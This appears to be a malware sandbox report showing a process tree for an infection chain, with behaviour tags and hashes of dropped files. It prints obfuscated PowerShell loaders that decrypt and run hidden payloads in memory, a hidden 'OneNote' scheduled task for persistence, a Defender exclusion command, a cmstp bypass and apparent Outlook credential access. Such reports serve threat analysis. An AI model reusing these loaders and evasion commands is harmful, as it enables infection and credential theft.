z r A v H O K O / b F y B / 7 / p W m k K D O 3 Q w i i U / U J L C 6 F Y S M m z S k 2 a T s k u W F 4 s J W c f a n 6 T n Z f E X o P w L S r x Y 8 q k n x X z c N 5 N P b L i W 1 I T X x X h f q P a i d d 8 H N 3 1 Z z q A x E W U a J z v v 0 t B W o K u y q E b G w 6 B Q j L E Z M Y F U z M 6 q n l z 4 + C 5 I i 9 C 9 K M z N u H t 3 s L F z K P c 3 n x 9 S e D D N P i T N + R 0 O 1 t Q M u L r H T m y r p U 5 l c T f k 6 b T n E S u e 1 O 2 8 X c 7 b b F M 1 X U / 9 8 L M z k V n U i m Z 5 r 0 5 a + r e 7 D b W i o K q p n z P k 7 r k g I A w D z h J 9 N R D K v a S U 5 q 3 M Y K J l + m p L 8 O F n J p v x p V X C D C I x T q 0 s 4 k S J s C / a W 3 A b / s T x i Z R f F 5 2 b R r Z D I V 1 j P + A D e x 4 x l R 4 d j 3 Q L 2 I r a Z t s / C T O K T / 9 G J K y h 7 q u a x + J y l 6 Q q U + k D 2 8 q 7 i 3 d E L G T 7 G b h p 4 g n c U + f V g y Y M t y t 1 r n 4 7 V A V R v G 2 h y y v / o 0 F b i X f k 5 L U A d a a r x s 4 + P z 4 Q A z 9 5 + N N d f d S Y A d y x U 5 E D X h y N Z S r v v Z B y n R Z k g H E p J L O K S w R n H 8 J H 6 V u + L w D s h C V Q 1 A 7 C P / F V W p L c Y 3 U 3 v L v k N A T 6 + o v 9 U I m p Y H 1 h h T n v k u i M 5 U N H z 4 q W l v 7 k V 5 w e Q U o + K d t o l P Z W f / c H f t T W k N 9 C F M m 6 N W L W F f s z 8 3 T c c v r 4 + s 8 r A j T 0 T 0 Y n 8 m B g X 3 F 8 A d u 8 1 o B r + c Q z S s U b Z 7 9 0 I t u U N 0 w x j l o I n q j F W u j + 1 4 m y d c K Z p 1 Z R D u X F P b k 1 b Q V N H c a K w q 6 1 s S w n R w 6 z A W 2 e 8 N v p e W R V L a H e + Q V Y j 0 A T s r n y T 5 i 0 i p g 6 1 S u l 4 1 2 5 G 0 n 5 H K 6 E + 2 b p I j T t W 8 w G x V 2 Y C G r Z d y X l 2 E K 4 N A R 3 s N x / 1 d Q q b D L 5 c N T Y 0 Q h s V f i c W 8 o w n 3 V s U / g K G V K A 5 N V 7 C f b e e v j R q 1 8 r r 2 F 8 Y n X s 7 J 8 Z 2 q c 2 t T J b G U 8 N O V q 0 m p b Z H U a + j G 3 b S m Y 9 N e U B E e Y o / n r q Q I 2 o s 6 n B t h z u + R B e v x T 6 n e p B H D p k U O x C U P N F N 0 1 s 5 n W k N 5 M Q k u H 5 / f T e D t h E r j d r a Q f l 5 A w i v d e 5 p u q G U q d t l 6 T / a / D t 9 6 W r V 4 M Z R 3 r q a F 4 U 6 d 6 E x c a w T t d g 6 G C 3 l J K P W l 7 E W V z e R Q L z 1 q x + H B T 5 4 2 F 5 8 4 F z f Z s Z u e / p Z M K 7 3 A f j h g N 6 j Q h X h 3 t x e I a 1 L D F V p d X E E a Z / z B p i q U s H G Q W z N P i p d L A J t 7 / v b G H 4 N 1 V L K y l j p 3 G 6 w t d g T B s D q A g t z W 3 Q K W W M S J 1 t f x v B 3 9 2 V 0 e J B w D s T T e X f 7 / / Z t z / j Q z m T l 4 J G R y C Q 3 N J G d h o z j v o b T A l J 0 c 9 k O W 3 w f S U h 5 K U 6 0 2 t j S c l 9 6 Q X 8 I y + 7 u Y z n N 7 m / o C B n Q A A K q B 2 W z y v 2 Z F F + J Z G j w H U G t / d E O y y 9 6 r 0 U z u X Q 9 m 8 Z y P l O t r N w T j K X U T r f / b p d N H / O L z 1 I Q B 6 1 j U I T E W A H 1 u + J s P o g w x H 5 T h K r Y e i P z 2 5 h Q s m u e Y m n H 3 h Y J w 8 3 6 d k n x 1 x o L A R e a + g N 6 E Z A I i K J n P V F K Q 4 1 J F D r b p s e O C c 5 j M y k C w 0 H T q 5 I S u y p r e l e u t E D Z i w 8 R W M i k m 0 4 c j c j D z M R y E 7 N F w d S Z / F r H l u I / L a K M q x M w c k p d h 5 + x 6 c o f I V Z W 4 d O l k 5 q Y p F v z C A C 6 C K p 5 R z C c F V 5 D N V 8 U p x L g X 7 2 a B 9 K x 4 G q u e 5 7 E 4 u i o s x U Y s r d k u j t w g w r Z y M z 4 i K u e t 4 Y 1 i U C v 8 J 5 V c T H 8 4 2 A r S l v p r w f B m R Q B v 0 B o Q c q L l m I B B F U h m 2 f A n z i + P 8 0 N 7 d X g k 4 c W 8 6 V f F K 5 F 9 8 n 4 m 1 k Z w l w C F i Z F j c t w t j 0 d K 0 i 7 h P F o c m t d X Z S n Y z 5 5 I z c C 1 K N J R k a B y I 1 y F 3 Y B + l Y A z 5 q / 9 b H 4 8 t m e F D s l j K V i 3 g 7 Z o N 0 B 8 Q N Q d g p h 8 K f N 6 B Q r 2 Y R Z P h O 0 E R O l l V E 5 L A f I s O O K s P k Y 7 1 e U z v o B B w X n X u G + i o E 2 8 w + r W C D h 0 X F i Q G 7 E / L 6 0 H y n O J b A Q M C W N b O r 6 7 L M N / z O S 3 s c k V U Q H 8 g k F u L l n M n 0 x r t c J N 9 9 Z 8 D 4 x d e F + a K 2 A M I e l f C a c m 9 t O 9 g j n q E u a Q n f Z v 4 Y z 5 q J k a 2 L G 3 T D p M H z s U A q S c B H K d c a c M R i 7 c 4 e A l I z E c u a E I N 8 s I d H C z U D F L b 2 G Y u 1 l u P a i Y d M Q O l / J F H x u f B 4 n r m j M B c t 7 d C r k X l W 6 j I 9 I C e v 7 7 H E B C u I q S X A e u 5 p o r 9 l Q 4 7 k t 8 d f 1 O 8 o Z x D n 1 w g 4 V j 8 n f S s 6 o Z 8 B C e t y o t S s O p y B J Y W 2 n i s F + x O d o q h C V h + D h n c Q T T / K 8 L 9 9 s h B i j r U q X P N L p J l 9 y d 8 W q 7 f H u V G s d r y h p c I z D 2 e r z / F u b / 9 0 i u N t F 2 5 L / j x E u n 0 1 n A 3 v 2 Y 7 7 T 2 I Q 6 S b 1 7 e o j j 9 x C w A H 2 8 6 4 X x k X h P W O q l v d i w c R z / W y E J 3 D 1 9 i I D 3 s 9 s k H A h 7 I K 6 A 3 j U U g / F w M d T P 7 k G m e 1 o f U H / B L D R K B + C b 9 x P / i j T W z t R B M T Q 7 3 4 q A B t 2 N p C K K O H k f u u q y O f q C R 6 S 8 j n b 3 P o + g N 2 9 5 n q g 2 0 T X m Q F r f 5 V d l V J T R p 2 m J 0 b j W l 2 4 Q W T c I E a P r 0 m z Z c L u 9 s C 7 P d + P + 7 W / 3 g b 0 L a p h H v 1 W M 2 o c B 8 G R l a m Z m 8 L M 2 g k X b D Z n a M e 4 m U F O X q b z y D A 5 m m s M 7 p 8 b 6 Q + Y R N w V e / G q 7 L 5 E 8 h + k N S 5 8 8 R 9 1 b H 5 v M N N i N B n Y 2 8 Q 6 4 d L 1 J n 1 e p p D H 8 R f N i z D a Q y m d / 2 D S w E G 0 9 j + E B R v L q C s v W E f G 8 7 S f w q c / U e e O 2 Z o A l N 2 W 4 P 6 q M B 6 S h x e S h 8 v F m b 9 p c Q e x L i b R x p v 0 y R 9 B Y f T R q h 6 3 Q x h r G t t K x R P s W b J 5 e C V b p n y g L o g P E S c b r t o a R S d j E w e T t V P G y 6 r j 7 u X A s 9 e 2 y u L z v D e R V W 4 s U R T I 6 w 6 V o M 0 M R J F D V 3 Q n f 4 n R C T B F q 8 X L P q A y y 7 X O w 9 w R e 2 S C n K Z b Q L L V Y G w 2 M E + 5 L 5 h m i c i y a l D z S I r D 5 4 M M W k 1 C m y Y 0 j V 0 L v H H W d f y b 9 1 P 9 L N i K X h 3 S w m W w B P H 1 H r S W j U M z N d B 7 I s 3 W r n N C D w p C F V W + U U I N x N l 1 y X y 8 c E R R S 0 r B S X O 6 6 C 6 e / P 2 c v X g r x t N A J T W c M F A A = = " ) 
         $ i   =   $ d [ 0 . . 1 5 ] 
         $ e   =   $ d [ 1 6 . . ( $ d . L e n g t h   -   1 ) ] 
         $ a e s   =   N e w - O b j e c t   S y s t e m . S e c u r i t y . C r y p t o g r a p h y . A e s M a n a g e d 
         $ a e s . M o d e   =   [ S y s t e m . S e c u r i t y . C r y p t o g r a p h y . C i p h e r M o d e ] : : C B C 
         $ a e s . K e y   =   $ a 
         $ a e s . I V   =   $ i 
         $ d e c   =   $ a e s . C r e a t e D e c r y p t o r ( ) 
         $ o u t   =   $ d e c . T r a n s f o r m F i n a l B l o c k ( $ e ,   0 ,   $ e . L e n g t h ) 
         $ r e s   =   [ T e x t . E n c o d i n g ] : : U T F 8 . G e t S t r i n g ( $ o u t ) 
         I n v o k e - E x p r e s s i o n   $ r e s 
  -inputFormat xml -outputFormat text3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aaoblhbk\aaoblhbk.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:596 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9B94.tmp" "c:\Users\Admin\AppData\Local\Temp\aaoblhbk\CSC338374BE2ED47E89F22B14CAADD0CD.TMP"5⤵PID:3936
-
-
-
C:\windows\system32\cmstp.exe"C:\windows\system32\cmstp.exe" /au C:\windows\temp\dmsob5ff.inf4⤵PID:2636
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\n1.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\n1.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\n1.bat';$QkEK='SplexkUitexkU'.Replace('exkU', ''),'CbUqOrbUqOeabUqOtebUqODecbUqOrbUqOybUqOpbUqOtorbUqO'.Replace('bUqO', ''),'MZgfwaiZgfwnMoZgfwdulZgfweZgfw'.Replace('Zgfw', ''),'FrbSRYomBbSRYasbSRYe6bSRY4StbSRYribSRYnbSRYgbSRY'.Replace('bSRY', ''),'DecaHWxomaHWxpraHWxesaHWxsaHWx'.Replace('aHWx', ''),'IMSwmnMSwmvoMSwmkMSwmeMSwm'.Replace('MSwm', ''),'CoHbycpyTHbycoHbyc'.Replace('Hbyc', ''),'GeBtWttCuBtWtrBtWtrBtWtenBtWttPrBtWtocBtWtessBtWt'.Replace('BtWt', ''),'EynVQntynVQrynVQyPoynVQintynVQ'.Replace('ynVQ', ''),'ChsWdlansWdlgesWdlEsWdlxsWdltesWdlnsWdlsisWdlosWdlnsWdl'.Replace('sWdl', ''),'LHcgboadHcgb'.Replace('Hcgb', ''),'RtuYueatuYudLtuYuituYunetuYustuYu'.Replace('tuYu', ''),'EleDFGgmeDFGgnDFGgtDFGgAtDFGg'.Replace('DFGg', ''),'ThSmVranhSmVsfhSmVormhSmVFihSmVnahSmVlBhSmVlohSmVckhSmV'.Replace('hSmV', '');powershell -w hidden;function zUhpG($Vgbyz){$emkHJ=[System.Security.Cryptography.Aes]::Create();$emkHJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$emkHJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$emkHJ.Key=[System.Convert]::($QkEK[3])('/Hfk3/0HindNj+4DXkevo5htFNrm49tWPnBdwypza2U=');$emkHJ.IV=[System.Convert]::($QkEK[3])('Tm3jafLgvfKY6mYPS/HLjQ==');$uFrFo=$emkHJ.($QkEK[1])();$ghdHz=$uFrFo.($QkEK[13])($Vgbyz,0,$Vgbyz.Length);$uFrFo.Dispose();$emkHJ.Dispose();$ghdHz;}function yGhYh($Vgbyz){$BiDCz=New-Object System.IO.MemoryStream(,$Vgbyz);$rDAyB=New-Object System.IO.MemoryStream;$gTfnb=New-Object System.IO.Compression.GZipStream($BiDCz,[IO.Compression.CompressionMode]::($QkEK[4]));$gTfnb.($QkEK[6])($rDAyB);$gTfnb.Dispose();$BiDCz.Dispose();$rDAyB.Dispose();$rDAyB.ToArray();}$GQdwM=[System.IO.File]::($QkEK[11])([Console]::Title);$asQpo=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 5).Substring(2))));$wqKmU=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 6).Substring(2))));[System.Reflection.Assembly]::($QkEK[10])([byte[]]$wqKmU).($QkEK[8]).($QkEK[5])($null,$null);[System.Reflection.Assembly]::($QkEK[10])([byte[]]$asQpo).($QkEK[8]).($QkEK[5])($null,$null); "4⤵PID:4236
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3196
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\n1')5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:516
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 73846' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network73846Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1132
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network73846Man.cmd"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3092 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network73846Man.cmd"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:356 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network73846Man.cmd';$QkEK='SplexkUitexkU'.Replace('exkU', ''),'CbUqOrbUqOeabUqOtebUqODecbUqOrbUqOybUqOpbUqOtorbUqO'.Replace('bUqO', ''),'MZgfwaiZgfwnMoZgfwdulZgfweZgfw'.Replace('Zgfw', ''),'FrbSRYomBbSRYasbSRYe6bSRY4StbSRYribSRYnbSRYgbSRY'.Replace('bSRY', ''),'DecaHWxomaHWxpraHWxesaHWxsaHWx'.Replace('aHWx', ''),'IMSwmnMSwmvoMSwmkMSwmeMSwm'.Replace('MSwm', ''),'CoHbycpyTHbycoHbyc'.Replace('Hbyc', ''),'GeBtWttCuBtWtrBtWtrBtWtenBtWttPrBtWtocBtWtessBtWt'.Replace('BtWt', ''),'EynVQntynVQrynVQyPoynVQintynVQ'.Replace('ynVQ', ''),'ChsWdlansWdlgesWdlEsWdlxsWdltesWdlnsWdlsisWdlosWdlnsWdl'.Replace('sWdl', ''),'LHcgboadHcgb'.Replace('Hcgb', ''),'RtuYueatuYudLtuYuituYunetuYustuYu'.Replace('tuYu', ''),'EleDFGgmeDFGgnDFGgtDFGgAtDFGg'.Replace('DFGg', ''),'ThSmVranhSmVsfhSmVormhSmVFihSmVnahSmVlBhSmVlohSmVckhSmV'.Replace('hSmV', '');powershell -w hidden;function zUhpG($Vgbyz){$emkHJ=[System.Security.Cryptography.Aes]::Create();$emkHJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$emkHJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$emkHJ.Key=[System.Convert]::($QkEK[3])('/Hfk3/0HindNj+4DXkevo5htFNrm49tWPnBdwypza2U=');$emkHJ.IV=[System.Convert]::($QkEK[3])('Tm3jafLgvfKY6mYPS/HLjQ==');$uFrFo=$emkHJ.($QkEK[1])();$ghdHz=$uFrFo.($QkEK[13])($Vgbyz,0,$Vgbyz.Length);$uFrFo.Dispose();$emkHJ.Dispose();$ghdHz;}function yGhYh($Vgbyz){$BiDCz=New-Object System.IO.MemoryStream(,$Vgbyz);$rDAyB=New-Object System.IO.MemoryStream;$gTfnb=New-Object System.IO.Compression.GZipStream($BiDCz,[IO.Compression.CompressionMode]::($QkEK[4]));$gTfnb.($QkEK[6])($rDAyB);$gTfnb.Dispose();$BiDCz.Dispose();$rDAyB.Dispose();$rDAyB.ToArray();}$GQdwM=[System.IO.File]::($QkEK[11])([Console]::Title);$asQpo=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 5).Substring(2))));$wqKmU=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 6).Substring(2))));[System.Reflection.Assembly]::($QkEK[10])([byte[]]$wqKmU).($QkEK[8]).($QkEK[5])($null,$null);[System.Reflection.Assembly]::($QkEK[10])([byte[]]$asQpo).($QkEK[8]).($QkEK[5])($null,$null); "7⤵
- System Location Discovery: System Language Discovery
PID:2544
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe7⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1092
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network73846Man')8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:396
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 73846' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network73846Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3132
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\swlbfxaifxztgzmyjbs"8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1596
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\uqqmgqkjbfryifacbmedcp"8⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:628
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\fkwehiddpnjkstwgkxrenczsz"8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1680
-
-
-
-
-
-
C:\Windows\system32\timeout.exetimeout /nobreak /t 14⤵
- Delays execution with timeout.exe
PID:4484
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess Powershell.exe1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4588
-
C:\Windows\system32\taskkill.exetaskkill /IM cmstp.exe /F1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2872
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5938ffc2cba917b243d86b2cf76dcefb4
SHA1234b53d91d075f16cc63c731eefdae278e2faad3
SHA2565c1eaf13b15f1d5d1ea7f6c3fcbeff0f8b0faf8b9a620ecd26edb49d667f56ca
SHA512e4ec928e5943a47739c862e3fd0c4bd9f1f21942e2416269f5057f5df49ce451d90acea39ee5319a0828ca1d944c2eda3eb8e7ab19984c7b8624a58f2111c314
-
Filesize
21KB
MD549f4e601c846e84545aa6208f82c4e32
SHA10505188d7b488ff547ecf2ed7454cff02c34581e
SHA2567fc6ff6c2ef7d04d3c6f2ca8dabe680033e38cd1c2ab88d2c0f699da7f21ffe2
SHA512653a28cc0bf8db0ab29929ade6366589d45d359ba9dd8f2cdbb406603213578c9c85e4c644feec46770a9cc1caf3edcd2585beb1fc277a6c6f3263362ecbd454
-
Filesize
20KB
MD5abc44172116e7874857d1f74b37bb732
SHA1ae24f4465f9c0eae5ee6e41daba4f627243cc89a
SHA256e97ea2858af9bbb4051dc9def961d7d85058d1c8af21067d2b3e5921c180f9a8
SHA512d255c4cf472fd251114b4d2a8cc86c5d0c976363ef35aa2ae78893b3e7d14d1771d52856a4586be0ca47ad7e710a21418c5279a84d1c019bf28dbcc354398247
-
Filesize
21KB
MD5a811e94bfc0bc73da368d03164b02dde
SHA12312067111cff958bacbdba72fcccfd5c81f807d
SHA256cad41609af8afa3305bc329c340002e516a3e0e5b9b2e5a69ec57b669608025f
SHA512531ac2ba0fec8aeaafbcd34b974eba57ca102bf03cd3272e8657afc91cbb165219f7b27fb659413f1901fe623a1c4038a22b7f599104f82ccb88b5a3753eb424
-
Filesize
20KB
MD539610ef65838d514691bf25f45ec1d00
SHA1f67a1af760598f8783b3bb55eaff48dc48dc9fe9
SHA25619c5aa213aacf12f9fbb858559d2bf32c83ead2e6a96601738f0a6a377fb0d21
SHA512290b4d58d3863bc36f90911b468fcaf84ac7497ca996de98210c709dba829884a43965904aeed6e0aa072617bae2b83f6c104fe9f7f23f0f7e96076d83809b43
-
Filesize
1KB
MD54abdf5877984973df7031e02dcdaa957
SHA1600bf4203f4cd3201b0595c9bd499d93ea9ebfc4
SHA256098b34ddc05f4a72404180784dad7fda1f2ed00d408bb76f7fa2ac924efd1cbe
SHA512f55b463a89a5b57e68b29c7c343b305fd2221bc07a004a5a85404fe4a5d979c657afcafb8fbfaf477ed434a5703014bc7ca3928794f8bc60e243744dee54265d
-
Filesize
1KB
MD5b66db53846de4860ca72a3e59b38c544
SHA12202dc88e9cddea92df4f4e8d83930efd98c9c5a
SHA256b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030
SHA51272eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527
-
Filesize
1KB
MD58b1a3b9961b46a75b6394f9a310c019b
SHA1e2e4bfa6b841ef7768ea57e6b06ca24cb24a65e1
SHA2564018373d34fa024ebbb2932c360e82c6b15291012f45e7cb1b41c61bff8cf667
SHA512880b4fef5fe8b25b42e590ebf6f3eb8d385b586d3672aec01a87c6401ae8d3f26ac840118b8f91885083cd67ea606765b812835302063d81241036df6eb455b6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD594c4156521fcea4ac164948475669a20
SHA11fe91d54689895e23355736a157ddae5a93b733b
SHA2566a2e70ad3ef0a0e5dc6a39b13faadfc28bf90ec1cae7791c580d0bbfda74caae
SHA512641ffbae2c1677debe806eeeb46a4f9f86dc2e4f5e642ff1fe733a77d11ef11eb3ba242b1cc276f24aa81f6bcf4d169ca7dca0dd28fbdb88576c0bae86073637
-
Filesize
562KB
MD5d1d99208a499e870e1e0a34a2cbba829
SHA185f7090ce76bdae0a07154b27117ec5ac9e9f673
SHA256d302c8c72b06785d8d4af94a118856907e3775becb17253ba62ccd3ddc669879
SHA512badea3d061cdfd1c7929be03d0c4c66eb5cab3091740f935d58a601a56f5be6c372c3ae48bef6ef759581a5c4244885de1c5c02247391bfca7aee5c1c62d7497
-
Filesize
4KB
MD5f1d2c01ce674ad7d5bad04197c371fbc
SHA14bf0ed04d156a3dc6c8d27e134ecbda76d3585aa
SHA25625b006032deccd628940ef728fffe83b325a85de453a34691f55f570e4460094
SHA51281cb982cc33dcc27600a8a681c3ec3cc5b9221b95baa45e1ab24479745a9638b9f31d7beeeb1128b3294ff69b44e958c75e25d565f66790c364665caff96ee77
-
Filesize
655B
MD5a50ad3c72d773f4374ccb89b74a7b0ea
SHA12efe6cda55cd90cfda1f6af35686f813e252a607
SHA256f48f5fbc541f12fcb33c204ad87fc80b693fd3241ecd1b79dbe2b6cc7b636f5a
SHA512d564a299836e15f8139263ffbd165a0f1fa6b6c0b30b6d037f7822aacea5351e7f8f461422e5258e754e4e80d1aa7b4773d91632b1c0264a64020fba5b9b728f
-
Filesize
652B
MD528604cc947937aa6d3e72e5ce3265af3
SHA19c07d11d7396549ddbcf5005401071828eed9324
SHA256675326cd2aee386c057a95bef1dd9f1cb0ba9656d4ed899f87bc2f404496b5a0
SHA51297e82671d57a3ad5617f2893868d8f016d645afcc5bcf921fe8676b670f7016c5ea0f05d3961ef5f456418a2edc9ff62ce83eb0864224398cf8b156749d8ebb0
-
Filesize
2KB
MD5da774b7c7335bf78596f22c13b46a80c
SHA143d248947111e2d943aa1c77df51fd5192e92797
SHA256da5feb1c361cdfd307e18c753790933d18968da7a5de454a2fae3d9dd5e1fba8
SHA5129c8efab5895c50069512e56b4efc81547f70092064cad8cf526a77f087dace036e876e4da5178d30be213b0c3d9214ef660920c6eff2c7474e5a6d47dfea40d0
-
Filesize
369B
MD5a021631729438b06ee07a5338f788fb9
SHA189369a2005187bcf69d768681bf9a89ff06b257b
SHA2561cf7e0be9f4b8bfd45395089864e7c6795f55a6c9009ca2003d267198f82f16d
SHA5125cda0eac6e00fb507c0e031f5e5a735cd9471a0a4819aedd3cbd796cb8f23dd10c3fc95ff63baa7c4466c722642bfb81d78644491c0d331389c60bf36d7ceb87